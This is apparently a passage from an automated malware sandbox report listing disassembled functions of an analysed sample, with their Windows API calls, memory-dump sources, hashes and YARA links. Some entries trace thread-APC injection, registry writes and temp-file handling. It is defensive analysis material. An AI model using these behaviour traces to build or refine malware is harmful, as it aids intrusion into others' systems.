                              0x013e5dd0
                              0x013e5dd6
                              0x013e5ddd
                              0x013e5dee
                              0x013e5df5
                              0x013e5e07
                              0x013e5e0e
                              0x013e5e11
                              0x013e5e1a
                              0x013e5e2c
                              0x013e5e42
                              0x013e5e47
                              0x013e5e4b
                              0x013e5e4f
                              0x013e5e56
                              0x013e5e59
                              0x013e5e5b
                              0x013e5e5b
                              0x013e5e65
                              0x013e5e6e
                              0x013e5e75
                              0x013e5e91
                              0x013e5e95
                              0x013e5ece
                              0x013e5e97
                              0x013e5e9a
                              0x013e5ea2
                              0x013e5eb3
                              0x013e5ebb
                              0x013e5ec3
                              0x013e5ec7
                              0x013e5ec7
                              0x013e5e95
                              0x013e5ed6
                              0x013e5ed6
                              0x013e5ede
                              0x013e5ede
                              0x013e5ee6
                              0x013e5ee6
                              0x013e5ef2

                              APIs
                              • GetTickCount.KERNEL32 ref: 013E5D5C
                              • lstrlen.KERNEL32(00000000,00000005), ref: 013E5DDD
                              • lstrlen.KERNEL32(?), ref: 013E5DEE
                              • lstrlen.KERNEL32(00000000), ref: 013E5DF5
                              • lstrlenW.KERNEL32(80000002), ref: 013E5DFC
                              • wsprintfW.USER32 ref: 013E5E42
                              • lstrlen.KERNEL32(?,00000004), ref: 013E5E65
                              • lstrlen.KERNEL32(?), ref: 013E5E6E
                              • lstrlen.KERNEL32(?), ref: 013E5E75
                              • lstrlenW.KERNEL32(?), ref: 013E5E7C
                              • wsprintfW.USER32 ref: 013E5EB3
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: lstrlen$wsprintf$CountFreeHeapTick
                              • String ID:
                              • API String ID: 822878831-0
                              • Opcode ID: c590d406e56af85806734deec3d15e3c9044cd309c7ffb1afdb1f6912b879532
                              • Instruction ID: 602053464af7b13d0c961fff1cf572f2354fdcc67174ed68d71e236e2fedf5a7
                              • Opcode Fuzzy Hash: c590d406e56af85806734deec3d15e3c9044cd309c7ffb1afdb1f6912b879532
                              • Instruction Fuzzy Hash: 3351517690032AEBCF219FA8DC49ADE7BF5EF44318F158064E908A7290DB35CA15DF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01029172, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 010291A8
                              • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 010291BD
                              • RegCreateKeyA.ADVAPI32(80000001,?), ref: 010291E5
                              • HeapFree.KERNEL32(00000000,?), ref: 01029226
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01029236
                              • RtlAllocateHeap.NTDLL(00000000,0103BE3B), ref: 01029249
                              • RtlAllocateHeap.NTDLL(00000000,0103BE3B), ref: 01029258
                              • HeapFree.KERNEL32(00000000,00000000,?,0103BE3B,00000000,?,?,?), ref: 010292A2
                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?,?), ref: 010292C6
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?), ref: 010292EB
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0103BE3B,00000000,?,?,?), ref: 01029300
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$Allocate$CloseCreate
                              • String ID:
                              • API String ID: 4126010716-0
                              • Opcode ID: 6cfe41e007f0f27d4a08ddd47338c4cbccb21be16b367aee74ed2c4e5ab005cb
                              • Instruction ID: cb713f1bafc74158cc822a58a68652b4af5df067e427f840f6e96e9fabba4024
                              • Opcode Fuzzy Hash: 6cfe41e007f0f27d4a08ddd47338c4cbccb21be16b367aee74ed2c4e5ab005cb
                              • Instruction Fuzzy Hash: DD51B3B5D0022DEFDF51DF99D9848EEBBB9FB08348F10806AF645A2124D3365A54DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010365E9, Relevance: 16.6, APIs: 11, Instructions: 119memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • PathFindFileNameW.SHLWAPI(?), ref: 01036603
                              • PathFindFileNameW.SHLWAPI(?), ref: 01036619
                              • lstrlenW.KERNEL32(00000000), ref: 0103665C
                              • RtlAllocateHeap.NTDLL(00000000,01048A03), ref: 01036672
                              • memcpy.NTDLL(00000000,00000000,01048A01), ref: 01036685
                              • _wcsupr.NTDLL ref: 01036690
                              • lstrlenW.KERNEL32(?,01048A01), ref: 010366C9
                              • RtlAllocateHeap.NTDLL(00000000,?,01048A01), ref: 010366DE
                              • lstrcpyW.KERNEL32(00000000,?), ref: 010366F4
                              • lstrcatW.KERNEL32(00000000,?), ref: 01036719
                              • HeapFree.KERNEL32(00000000,00000000), ref: 01036728
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                              • String ID:
                              • API String ID: 3868788785-0
                              • Opcode ID: 6c980ee30dd20224b6f0c8f03fac9ce6bafe7c8fccc37404027797a3244930d4
                              • Instruction ID: 2d963b7bb31078927aeeabe93bde2ac8060f0e37105275605a4c8c5b85f5e3bf
                              • Opcode Fuzzy Hash: 6c980ee30dd20224b6f0c8f03fac9ce6bafe7c8fccc37404027797a3244930d4
                              • Instruction Fuzzy Hash: 8D311336600214BBD3315F689DC892F7BEDEBC9350B154529FAD1D3185DB3B99008B61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102A4B8, Relevance: 16.6, APIs: 11, Instructions: 94memoryregistrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0102A4C9
                              • GetTempPathA.KERNEL32(00000000,00000000,?,?,010242B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0102A4E1
                              • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0102A4F0
                              • GetTempPathA.KERNEL32(00000001,00000000,?,?,010242B0,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0102A503
                              • GetTickCount.KERNEL32 ref: 0102A507
                              • wsprintfA.USER32 ref: 0102A51E
                              • RegCreateKeyA.ADVAPI32(80000001,?,00000000), ref: 0102A559
                              • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 0102A576
                              • lstrlen.KERNEL32(00000000), ref: 0102A580
                              • RegCloseKey.ADVAPI32(?), ref: 0102A59C
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000094,00000000,00000001,00000094,00000000), ref: 0102A5AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                              • String ID:
                              • API String ID: 1404517112-0
                              • Opcode ID: 3a7e3a30fd476ffdd754988421090dbe8a3c127da4cc4c3d2f1dffff44ae66b2
                              • Instruction ID: 6263ce52fe196c839ff3b60bf14e5b378215f6cae4180270f82d41db4960c056
                              • Opcode Fuzzy Hash: 3a7e3a30fd476ffdd754988421090dbe8a3c127da4cc4c3d2f1dffff44ae66b2
                              • Instruction Fuzzy Hash: EB316CB5600229FFDB219F95DD88DAF7BACEF04395B004065F986C3114DB368E01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103486F, Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 01034886
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 01034898
                              • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 010348A5
                              • wsprintfA.USER32 ref: 010348C0
                              • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000094,00000000), ref: 010348D6
                              • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 010348EF
                              • WriteFile.KERNEL32(00000000,00000000), ref: 010348F7
                              • GetLastError.KERNEL32 ref: 01034905
                              • CloseHandle.KERNEL32(00000000), ref: 0103490E
                              • GetLastError.KERNEL32(?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094,00000000), ref: 0103491F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,01024401,00000094,00000000,00000001,00000094,00000000,00000000,?,?,00000000,00000094), ref: 0103492F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                              • String ID:
                              • API String ID: 3873609385-0
                              • Opcode ID: 185d1c4a73966cc73e7d316fcd20c52174e3c2ffd125964b74d1f7a5c4a439c1
                              • Instruction ID: 5eddcbc68136626813f9586b4b69fa699edc557df7d801156e618a01a9815877
                              • Opcode Fuzzy Hash: 185d1c4a73966cc73e7d316fcd20c52174e3c2ffd125964b74d1f7a5c4a439c1
                              • Instruction Fuzzy Hash: 241190B9281218BFE3716A68ADCCF7B3B9CEB463A5F000065FAC2D6148DA5A0D048771
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01047313, Relevance: 15.3, APIs: 10, Instructions: 279memorythreadCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 0104738A
                              • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 010473A9
                                • Part of subcall function 0102B029: wsprintfA.USER32 ref: 0102B03C
                                • Part of subcall function 0102B029: CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 0102B04E
                                • Part of subcall function 0102B029: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0102B078
                                • Part of subcall function 0102B029: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0102B08B
                                • Part of subcall function 0102B029: CloseHandle.KERNEL32(?), ref: 0102B094
                              • GetLastError.KERNEL32 ref: 0104767C
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0104768C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0104769D
                              • RtlExitUserThread.NTDLL(?), ref: 010476AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocCriticalSectionTimerVirtualWaitable$CloseCreateEnterErrorExitHandleLastLeaveMultipleObjectsThreadUserWaitwsprintf
                              • String ID:
                              • API String ID: 1258333524-0
                              • Opcode ID: 41b233534721258753f51604fbe757af826d22d38d9a0972f026c576564c1545
                              • Instruction ID: 154f6f7d3a801beab19c282089612b8202d762811630af0a64a1c5d4d571073a
                              • Opcode Fuzzy Hash: 41b233534721258753f51604fbe757af826d22d38d9a0972f026c576564c1545
                              • Instruction Fuzzy Hash: 98B158F1900209AFEB319F69CDC4AAA7BEAFF08345F104579FA9AD2191E7359844CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103A589, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(04B3C988,00000000,00000000,00000000), ref: 0103A5AC
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5BB
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5C8
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 0103A5E0
                              • lstrlen.KERNEL32(?,00000000,00000000,00000000), ref: 0103A5EC
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0103A608
                              • wsprintfA.USER32 ref: 0103A6EA
                              • memcpy.NTDLL(00000000,00004000,?), ref: 0103A737
                              • InterlockedExchange.KERNEL32(01050184,00000000), ref: 0103A755
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103A796
                                • Part of subcall function 0102F559: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0102F582
                                • Part of subcall function 0102F559: memcpy.NTDLL(00000000,?,?), ref: 0102F595
                                • Part of subcall function 0102F559: RtlEnterCriticalSection.NTDLL(01050488), ref: 0102F5A6
                                • Part of subcall function 0102F559: RtlLeaveCriticalSection.NTDLL(01050488), ref: 0102F5BB
                                • Part of subcall function 0102F559: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0102F5F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                              • String ID:
                              • API String ID: 4198405257-0
                              • Opcode ID: b0a6360475dd118f7124faa22eac37db93b3f4ab3b648d0dd318474d49d9bb77
                              • Instruction ID: e6afacf48adf6f3c7eb21bb25f2602bb3f8ab60098a5fe472acf63ea8d2a9607
                              • Opcode Fuzzy Hash: b0a6360475dd118f7124faa22eac37db93b3f4ab3b648d0dd318474d49d9bb77
                              • Instruction Fuzzy Hash: 84616A71A0020AEFDB21CFA8D884EAF7BB9FB88340F04446AF995D7244D7799A54CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01043080, Relevance: 15.1, APIs: 10, Instructions: 102registrymemorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 010430A4
                                • Part of subcall function 0102267F: RegCloseKey.ADVAPI32(?,?,01032C45,00000000,00000000,?), ref: 01022706
                              • lstrcmpiW.KERNEL32(01032D37,?,?,01032D37,00000000,?,?,?,01032D37,00000000,00000001,00000000), ref: 010430D3
                              • lstrlenW.KERNEL32(?,?,01032D37,00000000,?,?,?,01032D37,00000000,00000001,00000000), ref: 010430E4
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0104311E
                              • RegCloseKey.ADVAPI32(?,?,?,?,01032D37,00000000,00000001,00000000), ref: 01043149
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0104315F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,01032D37,00000000,00000001,00000000), ref: 01043174
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 01043188
                              • HeapFree.KERNEL32(00000000,01032D37,?,?,?,01032D37,00000000,00000001,00000000), ref: 0104319D
                              • RegCloseKey.ADVAPI32(?,?,?,?,01032D37,00000000,00000001,00000000), ref: 010431A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
                              • String ID:
                              • API String ID: 4138089493-0
                              • Opcode ID: 783aa177e5491b75f7a9992d8755b43158dd1b0a45ad3859c3f31d5df01a3b7e
                              • Instruction ID: ce50c3185256c4dad221a48a78e44df1d707946032e3ba7530b2470df81bffbd
                              • Opcode Fuzzy Hash: 783aa177e5491b75f7a9992d8755b43158dd1b0a45ad3859c3f31d5df01a3b7e
                              • Instruction Fuzzy Hash: 0931ADB5600219FFDB22AF98DDC8DAF7BB9FB48300B004165F685D7028D7369A44DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102A740, Relevance: 15.1, APIs: 10, Instructions: 96filememorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102EEDE: memset.NTDLL ref: 0102EF00
                                • Part of subcall function 0102EEDE: CloseHandle.KERNEL32(?,?,?,?,?), ref: 0102EFAA
                              • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0102A787
                              • CloseHandle.KERNEL32(?), ref: 0102A793
                              • PathFindFileNameW.SHLWAPI(?), ref: 0102A7A3
                              • lstrlenW.KERNEL32(00000000), ref: 0102A7AD
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0102A7BE
                              • wcstombs.NTDLL ref: 0102A7CF
                              • lstrlen.KERNEL32(?), ref: 0102A7DC
                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?), ref: 0102A819
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102A82B
                              • DeleteFileW.KERNEL32(?), ref: 0102A839
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                              • String ID:
                              • API String ID: 2256351002-0
                              • Opcode ID: 1e5a58a002526f112e48a8460f6e56b718941c991000ca50d368300df76a7932
                              • Instruction ID: cb8af6a2bfe59c9caf721f62085a04ddf6a026cc36063e20ff5869b3a3bedff8
                              • Opcode Fuzzy Hash: 1e5a58a002526f112e48a8460f6e56b718941c991000ca50d368300df76a7932
                              • Instruction Fuzzy Hash: 46311E76A00219FFDF219FA8DD8889E7FB9FF04341B004069FA92A3114DB368955DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D6A6, Relevance: 15.1, APIs: 10, Instructions: 78stringfilememoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetTickCount.KERNEL32 ref: 0103D6B6
                              • CreateFileW.KERNEL32(01024252,80000000,00000003,01050244,00000003,00000000,00000000,?,00000000,?,01024252), ref: 0103D6D3
                              • GetLastError.KERNEL32(?,00000000,?,01024252), ref: 0103D77B
                                • Part of subcall function 0103A02D: lstrlen.KERNEL32(?,00000000,00000000,00000027,?,?,00000000,0103D07F,?,00000000,?,?,?,01022E53,80000001), ref: 0103A063
                                • Part of subcall function 0103A02D: lstrcpy.KERNEL32(00000000,00000000), ref: 0103A087
                                • Part of subcall function 0103A02D: lstrcat.KERNEL32(00000000,00000000), ref: 0103A08F
                              • GetFileSize.KERNEL32(01024252,00000000,?,00000001,?,00000000,?,01024252), ref: 0103D706
                              • CreateFileMappingA.KERNEL32(01024252,01050244,00000002,00000000,00000000,01024252), ref: 0103D71A
                              • lstrlen.KERNEL32(01024252,?,00000000,?,01024252), ref: 0103D736
                              • lstrcpy.KERNEL32(?,01024252), ref: 0103D746
                              • GetLastError.KERNEL32(?,00000000,?,01024252), ref: 0103D74E
                              • HeapFree.KERNEL32(00000000,01024252,?,00000000,?,01024252), ref: 0103D761
                              • CloseHandle.KERNEL32(01024252,?,00000001,?,00000000,?,01024252), ref: 0103D773
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                              • String ID:
                              • API String ID: 194907169-0
                              • Opcode ID: 9a253d0bc21c0cbaf8fadc4ca466519c3c3b96b3ef1626fe0a21c1c20ab272c0
                              • Instruction ID: c59aa89629e9010faa8b320951817aac120a56fb546e58ca552c7d08dd294d44
                              • Opcode Fuzzy Hash: 9a253d0bc21c0cbaf8fadc4ca466519c3c3b96b3ef1626fe0a21c1c20ab272c0
                              • Instruction Fuzzy Hash: 9F217FB4940208FFDB219FA4D988A9EBFB9FB44354F108469F586E3160E77A8E44CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102AF6F, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0102AF95
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0102AFA1
                              • GetModuleHandleA.KERNEL32(?,04B396FC,00000000,?,00000000), ref: 0102AFC1
                              • GetProcAddress.KERNEL32(00000000), ref: 0102AFC8
                              • Thread32First.KERNEL32(?,0000001C), ref: 0102AFD8
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0102AFF3
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0102B004
                              • CloseHandle.KERNEL32(00000000), ref: 0102B00B
                              • Thread32Next.KERNEL32(?,0000001C), ref: 0102B014
                              • CloseHandle.KERNEL32(?), ref: 0102B020
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 646bec8c5b6e06f5fec38cdc3a29c47bc720e7f635857a008f7d678cbebc0bd2
                              • Instruction ID: 07d7f991aa28fe8e86ff3a78e408752267696f7721b7eac6460835a6f95d2d06
                              • Opcode Fuzzy Hash: 646bec8c5b6e06f5fec38cdc3a29c47bc720e7f635857a008f7d678cbebc0bd2
                              • Instruction Fuzzy Hash: 51218EB2A00118EFDF11AFE4DDC8DEE7BB9FB08380F004126FA91A7150D73A99058B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E5FC, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • SetEvent.KERNEL32(?,?,0102EA6E), ref: 0103E611
                                • Part of subcall function 010234EE: InterlockedExchange.KERNEL32(?,000000FF), ref: 010234F5
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0102EA6E), ref: 0103E631
                              • CloseHandle.KERNEL32(00000000,?,0102EA6E), ref: 0103E63A
                              • CloseHandle.KERNEL32(?,?,?,0102EA6E), ref: 0103E644
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0103E64C
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0103E664
                              • Sleep.KERNEL32(000001F4), ref: 0103E673
                              • CloseHandle.KERNEL32(?), ref: 0103E680
                              • LocalFree.KERNEL32(?), ref: 0103E68B
                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0103E695
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                              • String ID:
                              • API String ID: 1408595562-0
                              • Opcode ID: 86095ef833740951b84a2b20bef273b0a1579b4ee667d7739be9c236ca54af74
                              • Instruction ID: 2a7213632a17ea0d6da1dff88c883dd896c46f0c78fd05cb4b7429504e4485ea
                              • Opcode Fuzzy Hash: 86095ef833740951b84a2b20bef273b0a1579b4ee667d7739be9c236ca54af74
                              • Instruction Fuzzy Hash: 31118CB9240315EFDB306B69D98895ABBEDBF887803000A28F2C2D3454CB3AE8009B14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01041218, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,0102276D,00000000,00000001,?,?,?), ref: 0104122F
                              • lstrlen.KERNEL32(?), ref: 0104123F
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 01041273
                              • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0104129E
                              • memcpy.NTDLL(00000000,?,?), ref: 010412BD
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0104131E
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 01041340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Allocatelstrlenmemcpy$Free
                              • String ID: W
                              • API String ID: 3204852930-655174618
                              • Opcode ID: c66ebbb308ac5a96eb97bcd233f869265a62555e95f26408e0ea7d4d683aab9c
                              • Instruction ID: 7fa752c0726ea23d48d3f5a11882ebde9c8548b451db61d72554e24c119ea2e1
                              • Opcode Fuzzy Hash: c66ebbb308ac5a96eb97bcd233f869265a62555e95f26408e0ea7d4d683aab9c
                              • Instruction Fuzzy Hash: D6411AB590020AEFDF11DF94C9C4AAE7BB9FF04345F148065F995A7210E731AA94DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102536B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 111memoryfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(010500CC), ref: 0102537D
                              • lstrcpy.KERNEL32(00000000), ref: 010253B9
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • GetLastError.KERNEL32(00000000), ref: 01025448
                              • HeapFree.KERNEL32(00000000,?), ref: 0102545F
                              • InterlockedDecrement.KERNEL32(010500CC), ref: 01025476
                              • DeleteFileA.KERNEL32(00000000), ref: 01025497
                              • HeapFree.KERNEL32(00000000,00000000), ref: 010254A7
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103D619: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                                • Part of subcall function 0103D619: GetCurrentThreadId.KERNEL32 ref: 0103D651
                                • Part of subcall function 0103D619: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                                • Part of subcall function 0103D619: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                                • Part of subcall function 0103D619: lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                              • String ID: t
                              • API String ID: 908044853-2238339752
                              • Opcode ID: b61deb9adc965e4484b3469c2825be83c776d8200419f07ceb16159907b3be19
                              • Instruction ID: 46fbe8f1e5d81dda25dac325039fa9c9ffea048d686e13a11b087d51e8416fd3
                              • Opcode Fuzzy Hash: b61deb9adc965e4484b3469c2825be83c776d8200419f07ceb16159907b3be19
                              • Instruction Fuzzy Hash: 91314876A00225FBDB21AFA4CD84AEEBBB8EF44715F108065FAC5EB144DB758A40C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102FD22, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,?,00000000,00000000,0103D9EF,00000011,?,00000001,00000000,?,-00000008), ref: 0102FD52
                              • RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 0102FD68
                              • memcpy.NTDLL(00000010,?,00000000), ref: 0102FD9E
                              • memcpy.NTDLL(00000010,00000000,?), ref: 0102FDB9
                              • CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 0102FDD7
                              • GetLastError.KERNEL32 ref: 0102FDE1
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0102FE04
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                              • String ID: (
                              • API String ID: 2237239663-3887548279
                              • Opcode ID: 08912b0484d4ad2c2b19279b4de1577618e07c906e54fb0e8bee5474bc576e53
                              • Instruction ID: d4bd877bd3852ce2f3e0362ae5e6f2770b5e9a714ff1b93414c9e1c818f88688
                              • Opcode Fuzzy Hash: 08912b0484d4ad2c2b19279b4de1577618e07c906e54fb0e8bee5474bc576e53
                              • Instruction Fuzzy Hash: 7231E37A90031AEFDB61DFA8D884A9F7BB9FB44350F004429FE86D3214D2359914CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010416BD, Relevance: 13.6, APIs: 9, Instructions: 130memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
